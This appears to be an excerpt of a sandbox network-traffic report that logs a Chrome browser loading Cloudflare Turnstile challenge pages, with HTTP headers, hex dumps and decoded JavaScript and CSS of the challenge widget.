                            Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                            2024-12-18 20:05:36 UTC1369INData Raw: 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 4f 56 45 52 52 55 4e 4e 49 4e 47 3d 22 6f 76 65 72 72 75 6e 6e 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72
                            Data Ascii: ING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(it||(it={}));var We;(function(e){e.FAILURE="failure",e.VERIFYING="verifying",e.OVERRUNNING="overrunning",e.CUSTOM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function ot(e){r
                            2024-12-18 20:05:36 UTC1369INData Raw: 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 76 61 72 20 48 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 56 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 5a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 65 72 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 74 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 5f 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 45 74 3d 22 67 2d 72 65 63 61 70
                            Data Ascii: el",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}var He="cf-chl-widget-",V="cloudflare-challenge",Zt=".cf-turnstile",er=".cf-challenge",tr=".g-recaptcha",_t="cf_challenge_response",bt="cf-turnstile-response",Et="g-recap
                            2024-12-18 20:05:36 UTC1369INData Raw: 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 3f 4d 72 28 7b 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3a 6c 2c 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 3a 67 2c 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 3a 63 7d 29 3a 63 26 26 67 3f 22 35 32 30 70 78 22 3a 63 26 26 6c 3f 22 35 30 30 70 78 22 3a 63 3f 22 34 38 30 70 78 22 3a 67 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4d 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f
                            Data Ascii: existent");return o?Mr({isModeratelyVerbose:l,isVerboseLanguage:g,isSmallerFeedback:c}):c&&g?"520px":c&&l?"500px":c?"480px":g?"580px":"570px"},Mr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?
                            2024-12-18 20:05:36 UTC1369INData Raw: 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 6e 29 7d 2c 63 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 75 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e
                            Data Ascii: __||Object.getPrototypeOf(n)},ce(e)}function ur(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function qe(e){var r=typeof Map=="function"?new Map:void 0;return qe=function(o){if(o===null||!ur(o))return o;if(typeof o!="function")throw n
                            2024-12-18 20:05:36 UTC1369INData Raw: 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 6e 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 44 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 29 7b 76 61 72 20 65 3d 41 74 28 29 3b 65 7c 7c 6d 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d
                            Data Ascii: &&e.test(r.src))return r;for(var n=document.querySelectorAll("script"),o=0,c;c=n[o];o++)if(D(c,HTMLScriptElement)&&e.test(c.src))return c}function fr(){var e=At();e||m("Could not find Turnstile script tag, some features may not be available",43777);var r=
                            2024-12-18 20:05:36 UTC1369INData Raw: 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 45 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 45 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 34 35 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 52 74 28 72 29 2c 45 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 45 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 45 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e
                            Data Ascii: me="cf-turnstile-feedback",E.id="cf-fr-id",E.style.width="100vw",E.style.maxWidth="450px",E.style.height=Rt(r),E.style.position="relative",E.style.zIndex="2147483647",E.style.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.449753104.18.95.414433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:35 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qxcw1/0x4AAAAAAA1mKXkckysS78WX/auto/fbE/normal/auto/ HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: iframe
                            Referer: https://vcya.warmickmak.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:36 UTC1362INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 20:05:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 26678
                            Connection: close
                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                            cross-origin-embedder-policy: require-corp
                            cross-origin-opener-policy: same-origin
                            cross-origin-resource-policy: cross-origin
                            origin-agent-cluster: ?1
                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                            referrer-policy: same-origin
                            document-policy: js-profiling
                            2024-12-18 20:05:36 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 31 63 34 63 34 32 65 37 32 35 65 37 38 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                            Data Ascii: Server: cloudflareCF-RAY: 8f41c4c42e725e78-EWRalt-svc: h3=":443"; ma=86400
                            2024-12-18 20:05:36 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                            2024-12-18 20:05:36 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                            2024-12-18 20:05:36 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                            2024-12-18 20:05:36 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                            2024-12-18 20:05:36 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                            2024-12-18 20:05:36 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                            2024-12-18 20:05:36 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                            2024-12-18 20:05:36 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                            2024-12-18 20:05:36 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.449755104.18.95.414433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:37 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f41c4c42e725e78&lang=auto HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qxcw1/0x4AAAAAAA1mKXkckysS78WX/auto/fbE/normal/auto/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:37 UTC331INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 20:05:37 GMT
                            Content-Type: application/javascript; charset=UTF-8
                            Content-Length: 117612
                            Connection: close
                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Server: cloudflare
                            CF-RAY: 8f41c4cf28184316-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-18 20:05:37 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
